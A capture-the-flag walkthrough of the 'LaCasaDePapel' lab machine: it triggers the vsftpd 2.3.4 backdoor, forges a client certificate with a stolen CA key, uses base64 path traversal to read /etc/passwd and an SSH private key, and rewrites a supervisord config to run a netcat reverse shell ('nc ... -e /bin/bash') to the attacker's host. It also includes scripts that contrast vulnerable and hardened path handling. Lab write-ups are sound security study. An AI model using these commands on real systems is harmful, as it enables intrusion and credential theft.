LaCasaDePapel

From Luniwiki

LaCasaDePapel01.png

Ports scan

u505@kali:~/HTB/Machines/LaCasaDePapel$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.131 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-20 18:02:41 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 21/tcp on 10.10.10.131
Discovered open port 443/tcp on 10.10.10.131
Discovered open port 22/tcp on 10.10.10.131

masscan at --rate=1000 did not report port 80, which the nmap scan below finds, so the two results are worth cross-checking rather than trusting either one alone.

u505@kali:~/HTB/Machines/LaCasaDePapel$ nmap -sC -sV 10.10.10.131
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-20 13:09 EST
Nmap scan report for lacasadepapel.htb (10.10.10.131)
Host is up (0.038s latency).
Not shown: 914 closed ports, 82 filtered ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      vsftpd 2.3.4
22/tcp  open  ssh      OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA)
|   256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA)
|_  256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519)
80/tcp  open  http     Node.js (Express middleware)
|_http-title: La Casa De Papel
443/tcp open  ssl/http Node.js Express framework
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: La Casa De Papel
| ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel
| Not valid before: 2019-01-27T08:35:30
|_Not valid after:  2029-01-24T08:35:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|   http/1.1
|_  http/1.0
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.70 seconds

Port 80

LaCasaDePapel02.png

The page asks for an email address and a Google Authenticator token. Once they are submitted, the page tells us to follow the instructions sent to our mailbox.

LaCasaDePapel03.png

Port 443

The HTTPS site requires a TLS client certificate; without one the server answers 401, which is the http-auth result nmap reported above.

LaCasaDePapel04.png

Port 21

The FTP banner reports vsftpd 2.3.4, the release whose distributed tarball was trojaned with a backdoor. A banner is only a banner, so rather than trust the version string we trigger the backdoor by hand below.

u505@kali:~/HTB/Machines/LaCasaDePapel$ searchsploit vsftp 2.3.4
---------------------------------------------- ----------------------------------------
 Exploit Title                                |  Path
                                              | (/usr/share/exploitdb/)
---------------------------------------------- ----------------------------------------
vsftpd 2.3.4 - Backdoor Command Execution (Me | exploits/unix/remote/17491.rb
---------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/LaCasaDePapel$ searchsploit -m 17491.rb
  Exploit: vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
      URL: https://www.exploit-db.com/exploits/17491
     Path: /usr/share/exploitdb/exploits/unix/remote/17491.rb
File Type: Ruby script, ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/LaCasaDePapel/17491.rb

The backdoor payload is simple: when the FTP username contains the string :) the daemon opens a listener on TCP port 6200 that hands out a shell. The Metasploit module sends the trigger too, but reports no session.

u505@kali:~/HTB/Machines/LaCasaDePapel$ nc lacasadepapel.htb 6200
Ncat: Connection refused.
u505@kali:~/HTB/Machines/LaCasaDePapel$ ftp lacasadepapel.htb
Connected to lacasadepapel.htb.
220 (vsFTPd 2.3.4)
Name (lacasadepapel.htb:u505): u505:)
331 Please specify the password.
Password:
dsdfs
^C
421 Service not available, remote server has closed connection
u505@kali:~/HTB/Machines/LaCasaDePapel$ nc lacasadepapel.htb 6200
Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman

Instead of a Unix shell we get a Psy Shell, an interactive PHP REPL. That is why Metasploit could not open a session: its module expects a plain shell on port 6200.

Psy shell

PHP's filesystem functions let us browse the server from the REPL.

scandir ("/home");
=> [
    ".",
    "..",
    "berlin",
    "dali",
    "nairobi",
    "oslo",
    "professor",
  ]

...

scandir ("/home/berlin");
=> [
    ".",
    "..",
    ".ash_history",
    ".ssh",
    "downloads",
    "node_modules",
    "server.js",
    "user.txt",
  ]
echo readfile("/home/berlin/user.txt");
PHP Warning:  readfile(/home/berlin/user.txt): failed to open stream: Permission denied in phar://eval()'d code on line 1

The user flag is in berlin's home directory, but the user running the REPL cannot read it.

scandir("/home/dali/.ssh");
=> [
    ".",
    "..",
    "authorized_keys",
    "known_hosts",
  ]
readfile("/home/dali/.ssh/authorized_keys");
ssh-rsa 
AAAAB3NzaC1yc2EAAAABIwAAAQEAsDHKXtzjeyuWjw42RbtoDy2c6lWdtfEzsmqmHrbJDY2hDcKWekWouWhe/NTCQFim6weKtsEdTzh0Qui+6jKc8/ZtpKzHrXiSXSe48JwpG7abmp5iCihzDozJqggBNoAQrvZqBhg6svcKh8F0kTnxUkBQgBm4kjOPteN+TfFoNIod7DQ72/N25D/lVThCLcStbPkR8fgBz7TGuTTAsNFXVwjlsgwi2qUF9UM6C1JkMBk5Y9ssDHiu4R35R5eCl4EEZLL946n/Gd5QB7pmIRHMkmt2ztOaKU4xZthurZpDXt+Et+Rm3dAlAZLO/5dwjqIfmEBS1eQ4sT8hlUkuLvjUDw== thek@ThekMac.local
=> 400

dali accepts SSH logins with the private key matching this authorized_keys entry; we do not have that key.

scandir ("/home/nairobi");
=> [
    ".",
    "..",
    "ca.key",
    "download.jade",
    "error.jade",
    "index.jade",
    "node_modules",
    "server.js",
    "static",
  ]
readfile("/home/nairobi/ca.key");
-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----
1704

We found a private key named ca.key, possibly the key of the certificate authority that issues the client certificates for port 443.

scandir ("/home/oslo/Maildir/.Sent/cur");
=> [
    ".",
    "..",
    "1582228357085.M22583P98548V0000000000068519I00000000018a624.lacasadepapel.htb,S=430,2,S",
  ]
readfile("/home/oslo/Maildir/.Sent/cur/1582228357085.M22583P98548V0000000000068519I00000000018a624.lacasadepapel.htb,S=430,2,S");
Content-Type: text/plain; format=flowed
From: dali@lacasadepapel.htb
To: 505559U@gmail.com
Content-Transfer-Encoding: 7bit
Date: Thu, 20 Feb 2020 19:52:37 +0000
Message-Id: <1582228357097-cf67b847-00a5d654-9b60e918@lacasadepapel.htb>
MIME-Version: 1.0

Welcome to our community! Thanks for signing up. To continue, please verify your email address by clicking the url below. https://lacasadepapel.htb/8b47e8d0-541a-11ea-b783-f7248254501e
=> 453

The mail is the one triggered by our sign-up on port 80. We follow the link.

LaCasaDePapel06.png

The link lets us download ca.crt, the CA certificate. We can check whether this CA is the one whose private key we found in nairobi's home directory by comparing the public key embedded in the certificate with the public key derived from ca.key.

u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl x509 -noout -pubkey -in ca.crt
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
ZwIDAQAB
-----END PUBLIC KEY-----
u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl rsa -in ca.key -pubout
writing RSA key
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
ZwIDAQAB
-----END PUBLIC KEY-----

The public keys match, so ca.key is the private key of the CA the site trusts, and we can issue our own client certificates with it.

Client certificate creation

Private key

First we generate our own private key.

u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl genrsa -out u505.key 2048
Generating RSA private key, 2048 bit long modulus (2 primes)
...........................................+++++
..........................................................................................................................................+++++
e is 65537 (0x010001)

Certificate request

u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl req -new -key u505.key -out u505.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:BE
State or Province Name (full name) [Some-State]:BXL
Locality Name (eg, city) []:BXL
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Luniel
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:u505
Email Address []:505559U@gmail.com

Please enter the following 'extra' attributes to be sent with your certificate request
A challenge password []:
An optional company name []:

Sign our certificate with the CA

u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl x509 -req -days 3650 -in u505.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out u505.crt
Signature ok
subject=C = BE, ST = BXL, L = BXL, O = Luniel, CN = u505, emailAddress = 505559U@gmail.com
Getting CA Private Key

We check the signed certificate

u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl x509 -text -noout -in u505.crt
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number:
            1f:67:d2:c3:74:04:a1:fc:ea:df:11:59:c0:3a:96:f8:ca:50:2c:86
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN = lacasadepapel.htb, O = La Casa De Papel
        Validity
            Not Before: Feb 21 13:31:54 2020 GMT
            Not After : Feb 18 13:31:54 2030 GMT
        Subject: C = BE, ST = BXL, L = BXL, O = Luniel, CN = u505, emailAddress = 505559U@gmail.com
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
                Modulus:
                    00:c1:2c:83:5c:67:85:a3:da:e5:cd:f0:05:45:12:
                    e2:4e:99:11:cf:b4:f6:97:b8:58:93:2d:d1:72:de:
                    28:0e:4d:0d:80:23:4e:c2:48:c5:23:48:0a:8b:4c:
                    4a:c0:e1:36:af:81:ae:dc:ac:cb:e3:a2:e5:2f:00:
                    44:e6:59:5a:58:6c:c0:fd:ea:cc:52:0e:de:c6:5e:
                    37:77:eb:d6:df:9f:c8:fe:14:92:90:ad:f6:d2:03:
                    04:ad:6a:c2:44:e7:2c:31:1d:12:d7:a7:14:4b:16:
                    71:0f:bf:c6:74:9a:9e:2f:1e:b8:3f:8a:37:df:83:
                    8c:bc:d9:c4:12:62:96:ae:19:b1:f9:02:c7:7b:0c:
                    85:92:c7:a7:b2:94:2b:77:5b:ae:8c:39:a7:bc:4e:
                    91:bd:fb:15:7e:da:5c:95:2b:87:61:1c:e7:fe:45:
                    57:98:ac:fc:db:4a:b8:61:93:62:db:cf:35:5e:ea:
                    ad:4f:9d:52:df:0c:9d:b8:99:8c:c5:6f:ce:f8:c3:
                    b0:b8:6b:36:fc:c2:d4:c3:a7:7d:aa:34:e7:c0:45:
                    f8:7c:6f:17:7b:6c:c6:ee:69:e7:b4:03:77:de:4f:
                    2a:12:7d:7d:2c:f1:75:45:c1:41:f5:3c:00:41:e8:
                    a6:e7:a9:c4:72:ba:e0:4d:e2:4f:01:3c:72:d1:61:
                    08:d9
                Exponent: 65537 (0x10001)
    Signature Algorithm: sha256WithRSAEncryption
         ab:4b:d1:d9:e4:11:ed:20:21:04:05:f9:db:84:c8:76:0a:74:
         c3:04:34:5f:6a:c1:4d:0b:bd:73:86:cf:5c:cb:b6:ad:88:e7:
         ae:00:2c:a6:2a:09:1e:0a:f2:f9:37:ab:68:38:54:2b:03:cf:
         98:df:28:ec:cc:6b:a0:b4:85:a1:f1:cd:98:49:58:e3:91:85:
         47:19:72:95:86:d1:29:36:f8:74:66:b4:ac:a8:a5:47:04:24:
         e8:fa:fe:0d:88:98:5a:e3:be:23:22:3d:42:51:a0:00:b5:83:
         97:5c:be:14:bc:bb:ec:1b:83:27:1a:f3:b9:2b:04:53:ac:4d:
         65:1f:8e:e6:b2:a5:4e:d9:a6:5c:5b:1d:7c:ed:11:cc:7d:61:
         f0:1e:8f:bb:a4:2b:1b:ea:54:81:5a:9e:f5:89:b0:9d:39:50:
         ea:21:18:4f:44:f8:e5:a7:9f:e8:d3:a1:e2:f4:db:58:3b:05:
         3c:65:f2:67:8f:1a:a2:83:8d:dc:a9:df:f1:e8:1e:8f:ff:73:
         11:20:c6:9b:62:9c:36:18:41:14:4a:0b:36:df:e9:da:63:b8:
         73:44:ad:57:bf:2d:08:9d:c3:cb:b2:1a:d2:dc:50:59:07:a7:
         75:90:b1:92:ec:4e:69:20:f4:60:35:f2:9a:69:e8:24:53:ca:
         d8:72:64:4e

Create a PKCS#12 bundle to import in Firefox

u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl pkcs12 -export -in u505.crt -inkey u505.key -out u505.pfx
Enter Export Password:
Verifying - Enter Export Password:
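The whole client-certificate flow above, scripted so it runs without prompts, as an added example that is not part of the original write-up. It generates a throwaway CA to stand in for the recovered ca.key/ca.crt (so it runs anywhere with openssl installed), adds the two checks a practitioner wants and that the write-up does by eye: a key-to-certificate match computed as a hash of the DER-encoded public key rather than a visual diff of PEM blobs, and openssl verify to confirm the CA actually vouches for the issued certificate. Note that openssl x509 -req without an extensions file produces a Version 1 certificate with no extensions, exactly as the certificate dump above shows; the server accepted it, but a stricter mTLS endpoint might require clientAuth extended key usage.

```shell
#!/bin/sh
# Added example (not from the write-up): non-interactive client-certificate
# issuance plus the checks that prove the CA key and the CA cert belong together.
set -e
WORK=$(mktemp -d)
cd "$WORK"

# Stand-in for the server's CA. In the write-up these are ca.key (read from
# /home/nairobi) and ca.crt (downloaded from the verification link).
make_ca() {
  openssl req -x509 -newkey rsa:2048 -nodes -keyout ca.key -out ca.crt -days 3650 \
    -subj "/CN=lacasadepapel.htb/O=La Casa De Papel" 2>/dev/null
}

# Compare the SHA-256 of the DER public key derived from a private key ($1)
# with the one inside a certificate ($2). Prints "match" or "mismatch".
key_matches_cert() {
  k=$(openssl pkey -in "$1" -pubout -outform DER | openssl dgst -sha256 | awk '{print $NF}')
  c=$(openssl x509 -in "$2" -noout -pubkey | openssl pkey -pubin -outform DER \
      | openssl dgst -sha256 | awk '{print $NF}')
  [ "$k" = "$c" ] && echo match || echo mismatch
}

# Issue a client certificate: key -> CSR -> CA-signed cert -> PKCS#12.
# $1 = name used for the files and the CN, $2 = CA cert, $3 = CA key.
# -subj replaces the interactive DN prompts from the write-up.
issue_client_cert() {
  openssl genrsa -out "$1.key" 2048 2>/dev/null
  openssl req -new -key "$1.key" -out "$1.csr" -subj "/C=BE/O=Luniel/CN=$1" 2>/dev/null
  openssl x509 -req -days 3650 -in "$1.csr" -CA "$2" -CAkey "$3" -CAcreateserial \
    -out "$1.crt" 2>/dev/null
  # Empty export password only for the demo; set a real one before importing into a browser.
  openssl pkcs12 -export -in "$1.crt" -inkey "$1.key" -out "$1.pfx" -passout pass: 2>/dev/null
}

# Does the CA ($1) validate the client certificate ($2)? Prints "ok" or "bad".
verify_chain() {
  openssl verify -CAfile "$1" "$2" >/dev/null 2>&1 && echo ok || echo bad
}

make_ca
issue_client_cert u505 ca.crt ca.key
echo "CA key vs CA cert: $(key_matches_cert ca.key ca.crt)"
echo "chain: $(verify_chain ca.crt u505.crt)"
echo "files in $WORK: u505.key u505.csr u505.crt u505.pfx"
```

With the real ca.key and ca.crt in place of make_ca, the same functions reproduce the write-up's certificate, and the curl calls later on the page use u505.crt and u505.key directly.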

Import the certificate in Firefox

LaCasaDePapel07.png

Open the web page with the client certificate.

LaCasaDePapel08.png

LaCasaDePapel09.png

Now we are able to access the "private" area of this server.

Digging into the web application

LaCasaDePapel10.png

The application lists directories through the path query parameter, and the file route takes a base64-encoded file name and returns that file. For example, the URL https://lacasadepapel.htb/file/U0VBU09OLTEvMDEuYXZp downloads:

u505@kali:~/HTB/Machines/LaCasaDePapel$ echo "U0VBU09OLTEvMDEuYXZp" | base64 -d 
SEASON-1/01.avi

If we try /etc/passwd:

u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/`echo -n "/etc/passwd" | base64`  
<!DOCTYPE html>
 <html lang="en">
 <head>
 <meta charset="utf-8">
 <title>Error</title>
 </head>
 <body>
 <pre>Error: ENOENT: no such file or directory, open '/home/berlin/downloads//etc/passwd'<br>    at Object.fs.openSync (fs.js:646:18)<br>    at Object.fs.readFileSync (fs.js:551:33)<br>    at 
 /home/berlin/server.js:32:15<br>    at Layer.handle [as handle_request] (/home/berlin/node_modules/express/lib/router/layer.js:95:5)<br>    at next (/home/berlin/node_modules/express/lib/router/route.js:137:13) <br>    at Route.dispatch (/home/berlin/node_modules/express/lib/router/route.js:112:3)<br>    at Layer.handle [as handle_request] (/home/berlin/node_modules/express/lib/router/layer.js:95:5)<br>    at 
 /home/berlin/node_modules/express/lib/router/index.js:281:22<br>    at param (/home/berlin/node_modules/express/lib/router/index.js:354:14)<br>    at param 
 (/home/berlin/node_modules/express/lib/router/index.js:365:14)</pre>
 </body>
 </html>

The stack trace shows that server.js simply concatenates /home/berlin/downloads/ with the decoded name (hence the double slash in the error), with no normalization and no check that the result stays inside the downloads directory. An absolute path therefore fails with ENOENT, but ../ sequences walk out of the directory.

User Flag

The URL https://lacasadepapel.htb/?path=../ lists berlin's home directory, which contains user.txt.

LaCasaDePapel11.png

We can download it through the file route and retrieve the contents.

u505@kali:~/HTB/Machines/LaCasaDePapel$ echo -n "../user.txt" | base64
Li4vdXNlci50eHQ=
u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/Li4vdXNlci50eHQ=
<USER_FLAG>
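To make the traversal concrete, here is an added example (not the box's server.js, whose source we never see) that models the file route two ways: the plain concatenation the stack trace reveals, and a hardened version that lexically normalizes the path and refuses anything outside the downloads directory. It also builds the base64 file parameter the way the write-up does. Everything is string handling, so it runs offline against paths that only exist on the target.

```shell
#!/bin/sh
# Added example: vulnerable vs. hardened path handling for the /file/<base64> route.
BASE=/home/berlin/downloads   # the prefix the stack trace shows being concatenated

# Lexically normalize an absolute path: drops '.' and empty components and
# resolves '..' without touching the filesystem, so it works for target paths.
normalize() {
  out=
  oldifs=$IFS
  IFS=/
  set -f
  for part in $1; do
    case $part in
      ''|.) ;;
      ..) out=${out%/*} ;;
      *) out=$out/$part ;;
    esac
  done
  set +f
  IFS=$oldifs
  printf '%s\n' "${out:-/}"
}

# What server.js does: base + '/' + decoded parameter, nothing else.
# An absolute parameter yields BASE//etc/passwd (the ENOENT above); '../' walks out.
vulnerable_path() { printf '%s\n' "$BASE/$1"; }

# Hardened version: normalize first, then require the result to stay under BASE.
safe_path() {
  p=$(normalize "$BASE/$1")
  case $p in
    "$BASE"|"$BASE"/*) printf '%s\n' "$p" ;;
    *) printf 'DENIED\n' ;;
  esac
}

# Encode the file parameter exactly as the write-up does (base64, no newline).
encode_file_param() { printf '%s' "$1" | base64 | tr -d '\n'; }

# Full URL for a given file name, e.g. file_url ../user.txt
file_url() { printf 'https://lacasadepapel.htb/file/%s\n' "$(encode_file_param "$1")"; }

echo "vulnerable: $(vulnerable_path ../user.txt)"
echo "hardened:   $(safe_path ../user.txt)"
echo "url:        $(file_url ../../../etc/passwd)"
```

Note that with the hardened check an absolute parameter such as /etc/passwd normalizes to a path under BASE and is served (or 404s) harmlessly; only the normalized-then-prefix-checked result decides, which is the property the original route lacks.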

Remote shell

Private key

In berlin's .ssh folder ( https://lacasadepapel.htb/?path=../.ssh/ ) there is an id_rsa file.

LaCasaDePapel12.png

u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/`echo -n "../.ssh/id_rsa" | base64` --output id_rsaberlin
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  3389  100  3389    0     0   5629      0 --:--:-- --:--:-- --:--:--  5620
u505@kali:~/HTB/Machines/LaCasaDePapel$ file id_rsaberlin
id_rsaberlin: OpenSSH private key

We try it as berlin, but the key is not accepted and SSH falls back to password prompts, so the key must belong to another account:

u505@kali:~/HTB/Machines/LaCasaDePapel$ chmod 600 id_rsaberlin
u505@kali:~/HTB/Machines/LaCasaDePapel$ ssh -i id_rsaberlin berlin@lacasadepapel.htb
The authenticity of host 'lacasadepapel.htb (10.10.10.131)' can't be established.
ECDSA key fingerprint is SHA256:rA99W+GVzo0hlABp1vMj9ChhjLwybPhHTpb65AWm7xI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'lacasadepapel.htb,10.10.10.131' (ECDSA) to the list of known hosts.
berlin@lacasadepapel.htb's password:
Permission denied, please try again.
berlin@lacasadepapel.htb's password:
Permission denied, please try again.
berlin@lacasadepapel.htb's password:
berlin@lacasadepapel.htb: Permission denied (publickey,password,keyboard-interactive).

Enumerate users

We could list /home from the web page:

LaCasaDePapel13.png

But it is simpler to download /etc/passwd directly, since the traversal is not limited to /home/berlin:

u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/`echo -n "../../../etc/passwd" | base64`
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
chrony:x:100:101:chrony:/var/log/chrony:/sbin/nologin
dali:x:1000:1000:dali,,,:/home/dali:/usr/bin/psysh
berlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ash
professor:x:1002:1002:professor,,,:/home/professor:/bin/ash
vsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin
memcached:x:102:102:memcached:/home/memcached:/sbin/nologin

There are not five users, as the /home listing suggested, but three accounts with a home directory and a login shell:

  • dali
  • berlin
  • professor

nairobi and oslo are not system accounts; their directories only hold the web application and the mail. dali's login shell is /usr/bin/psysh, which matches the Psy Shell served on port 6200: the FTP "backdoor" drops us into dali's account, which is consistent with the permission-denied error on berlin's user.txt.

User professor

With the user professor and the private key found in berlin's folder, we get a full SSH shell, complete with a banner:

u505@kali:~/HTB/Machines/LaCasaDePapel$ ssh -i id_rsaberlin professor@lacasadepapel.htb

[ASCII-art banner: La Casa De Papel]

lacasadepapel [~]$ whoami
professor

Local enumeration

u505@kali:~/HTB/Machines/LaCasaDePapel$ mkdir www
u505@kali:~/HTB/Machines/LaCasaDePapel$ cd www/
u505@kali:~/HTB/Machines/LaCasaDePapel/www$ cp /opt/utils/pspy/pspy64 ./
u505@kali:~/HTB/Machines/LaCasaDePapel/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/LaCasaDePapel/www$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

From the target machine:

lacasadepapel [/tmp]$ wget http://10.10.14.6/LinEnum.sh
Connecting to 10.10.14.6 (10.10.14.6:80)
LinEnum.sh           100% |********************************| 46631  0:00:00 ETA
lacasadepapel [/tmp]$ wget http://10.10.14.6/pspy64
Connecting to 10.10.14.6 (10.10.14.6:80)
pspy64               100% |********************************| 3006k  0:00:00 ETA
lacasadepapel [/tmp]$ chmod +x pspy64 LinEnum.sh

Cronjob

Running pspy64 shows root periodically restarting supervisord, which in turn launches memcached.js as nobody through sudo:

2020/02/22 13:44:00 CMD: UID=0    PID=6625   | /sbin/openrc-run /etc/init.d/supervisord restart
2020/02/22 13:44:00 CMD: UID=0    PID=6624   | /sbin/openrc-run /etc/init.d/supervisord restart
2020/02/22 13:44:01 CMD: UID=0    PID=6627   | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord stop
2020/02/22 13:44:01 CMD: UID=0    PID=6642   | start-stop-daemon --stop --exec /usr/bin/supervisord --pidfile /var/run/supervisord.pid
2020/02/22 13:44:01 CMD: UID=0    PID=6650   | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord start
2020/02/22 13:44:01 CMD: UID=0    PID=6649   | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord start
2020/02/22 13:44:01 CMD: UID=0    PID=6652   |
2020/02/22 13:44:01 CMD: UID=0    PID=6664   | start-stop-daemon --start --exec /usr/bin/supervisord --pidfile /var/run/supervisord.pid --background --make-pidfile -- --nodaemon --pidfile /var/run/supervisord.pid --configuration  /etc/supervisord.conf
2020/02/22 13:44:01 CMD: UID=0    PID=6665   | start-stop-daemon --start --exec /usr/bin/supervisord --pidfile /var/run/supervisord.pid --background --make-pidfile -- --nodaemon --pidfile /var/run/supervisord.pid --configuration  /etc/supervisord.conf
2020/02/22 13:44:01 CMD: UID=0    PID=6668   | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord start
2020/02/22 13:44:01 CMD: UID=0    PID=6672   | /usr/bin/python2 /usr/bin/supervisord --nodaemon --pidfile /var/run/supervisord.pid --configuration /etc/supervisord.conf
2020/02/22 13:44:02 CMD: UID=0    PID=6673   | sudo -u nobody /usr/bin/node /home/professor/memcached.js

We cannot read /etc/supervisord.conf:

lacasadepapel [~]$ cat /etc/supervisord.conf
cat: can't open '/etc/supervisord.conf': Permission denied
lacasadepapel [~]$ ls -l /etc/supervisord.conf
-rw-------    1 root     root           313 Jan 29  2019 /etc/supervisord.conf

We cannot read /home/professor/memcached.js either, but the file next to it is world-readable:

lacasadepapel [~]$ ls -ltr
total 12
-rw-r-----    1 root     nobody         434 Jan 29  2019 memcached.js
-rw-r--r--    1 root     root            88 Jan 29  2019 memcached.ini
drwxr-sr-x    9 root     professo      4096 Jan 29  2019 node_modules

The .ini file is a supervisord program definition; its command line is what supervisord, running as root, executes each time the cron job restarts it.

lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js

Escalation of privileges

Start a listener

u505@kali:~/HTB/Machines/LaCasaDePapel/www$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Change memcached.ini

We cannot write to the file (root-owned, mode 644), but it sits in professor's home directory, which professor owns. Renaming or deleting a file needs write permission on the directory, not on the file itself.

lacasadepapel [~]$ ls -lta
total 24
drwxr-sr-x    4 professo professo      4096 Mar  6  2019 .
drwxr-xr-x    7 root     root          4096 Feb 16  2019 ..
drwx------    2 professo professo      4096 Jan 31  2019 .ssh
drwxr-sr-x    9 root     professo      4096 Jan 29  2019 node_modules
-rw-r--r--    1 root     root            88 Jan 29  2019 memcached.ini
-rw-r-----    1 root     nobody         434 Jan 29  2019 memcached.js
lrwxrwxrwx    1 root     professo         9 Nov  6  2018 .ash_history -> /dev/null

So we can move the original aside:

lacasadepapel [~]$ mv memcached.ini memcached.ini.org

And create our own. Dropping the sudo -u nobody prefix means the command runs with supervisord's own privileges, i.e. as root:

lacasadepapel [~]$ vi memcached.ini
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = nc 10.10.14.6 4444 -e /bin/bash

Reverse shell

